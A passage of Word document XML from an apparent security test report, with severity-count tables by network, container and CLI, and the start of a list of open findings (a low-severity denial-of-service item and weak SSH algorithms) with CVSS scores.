          <w:p w14:paraId="46A48CA9" w14:textId="0AD6C202" w:rsidR="009604BC" w:rsidRDefault="002A1EBC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="70A22B4C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B049F64" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B638529" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43F85AD3" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29C11DD5" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="6CF9B485" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18640849" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="509E8DCB" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DB28434" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7486A876" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="0F8FED6D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="428F43AF" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D2463AC" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="481081D2" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C5121F1" w14:textId="5467368E" w:rsidR="009604BC" w:rsidRDefault="0018245B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="2FEC5749" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F941E08" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1050CB90" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="069DFEB3" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7640D305" w14:textId="6353B470" w:rsidR="009604BC" w:rsidRDefault="00ED40B2">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="4405D585" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="18DD57B9" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="7E7B23A1" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="5512C602" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="4C431191" w14:textId="707EAFD9" w:rsidR="009604BC" w:rsidRDefault="00ED40B2">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EDD3419" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc200562827"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Repeat Vulnerability Snapshot From Previous Test Cycle</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="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20" w:type="dxa"/>
          <w:bottom w:w="50" w:type="dxa"/>
          <w:right w:w="20" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2350"/>
        <w:gridCol w:w="2350"/>
        <w:gridCol w:w="2350"/>
        <w:gridCol w:w="2350"/>
      </w:tblGrid>
      <w:tr w:rsidR="009604BC" w14:paraId="041D0145" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="77246252" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="49DCC951" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Network Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="36240710" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Container Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="1F2FB41A" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>CLI Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="31829410" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67C673E7" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43595BD4" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5624B7F8" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59B28AC5" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="2EEA09C6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7977043F" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65EAEE4E" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00C50546" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2168073A" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="21655AF5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6385BDC4" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CCDFFAE" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25D66E8F" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E5C2E34" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="002654C1" w14:textId="77777777" w:rsidR="00DB338C" w:rsidRDefault="00DB338C" w:rsidP="006B2FCF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29791825" w14:textId="77777777" w:rsidR="00AA768E" w:rsidRDefault="00AA768E" w:rsidP="00FF1167">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0911E3D2" w14:textId="77777777" w:rsidR="00AA768E" w:rsidRDefault="00AA768E" w:rsidP="00FF1167">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485F2938" w14:textId="25A01351" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc200562828"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Summary of Open Vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="05BD1660" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Network Security Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="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50" w:type="dxa"/>
          <w:bottom w:w="70" w:type="dxa"/>
          <w:right w:w="50" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2455"/>
        <w:gridCol w:w="2531"/>
        <w:gridCol w:w="1257"/>
        <w:gridCol w:w="2061"/>
        <w:gridCol w:w="1156"/>
      </w:tblGrid>
      <w:tr w:rsidR="009604BC" w14:paraId="5AB6B750" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="421009DC" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="7C572478" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="361F10D9" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Defect Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="60D6150B" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="0FF23A64" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="0DD31F9D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EA35F9D" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Active Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C97E4EC" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Denial-of-Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A36183C" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId10" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=194309">
              <w:r>
                <w:t>194309</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6DC066"/>
          </w:tcPr>
          <w:p w14:paraId="084CA239" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6DC066"/>
          </w:tcPr>
          <w:p w14:paraId="7EF811E3" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId11" w:anchor="CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L">
              <w:r>
                <w:rPr>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>3.5</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="688112F0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77707E1B" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Auditing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31A2DB3A" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>SSH Weak Algorithms Supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FC11F01" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId12" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=194311">
              <w:r>
                <w:t>194311</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6DC066"/>
          </w:tcPr>
          <w:p w14:paraId="3ECF4886" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6DC066"/>
          </w:tcPr>
          <w:p w14:paraId="311E0A62" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId13" w:anchor="CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N">
              <w:r>
                <w:rPr>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>3.1</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
